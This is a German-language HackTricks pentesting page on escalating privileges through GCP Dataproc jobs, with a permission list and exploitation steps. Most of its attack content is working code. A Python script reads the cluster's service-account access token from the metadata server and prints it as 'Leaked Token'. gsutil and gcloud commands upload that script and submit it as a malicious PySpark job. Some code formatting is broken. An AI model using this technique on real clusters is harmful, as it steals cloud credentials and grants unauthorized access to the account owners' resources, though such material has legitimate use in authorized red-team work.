GCP Dataproc Privilege Escalation

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Dataproc

GCP - Dataproc Enum

dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get

Mit dieser Methode konnte ich keine reverse shell bekommen; es ist jedoch möglich, den SA-Token vom Metadata-Endpoint zu leaken, wie unten beschrieben.

Steps to exploit

  • Lege das Job-Skript in den GCP-Bucket.

  • Sende einen Job an einen Dataproc-Cluster.

  • Nutze den Job, um auf den Metadata-Server zuzugreifen.

  • Leake das vom Cluster verwendete Service-Account-Token.

Python-Skript zum Abrufen des SA-Tokens vom Metadata-Server ```python import requests

metadata_url = “http://metadata/computeMetadata/v1/instance/service-accounts/default/token” headers = {“Metadata-Flavor”: “Google”}

def fetch_metadata_token(): try: response = requests.get(metadata_url, headers=headers, timeout=5) response.raise_for_status() token = response.json().get(“access_token”, “”) print(f“Leaked Token: {token}“) return token except Exception as e: print(f“Error fetching metadata token: {e}”) return None

if name == “main”: fetch_metadata_token()

</details>

<details><summary>Bösartigen Job an Dataproc-Cluster senden</summary>
```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>

# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--cluster=<cluster-name> \
--region=<region>

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks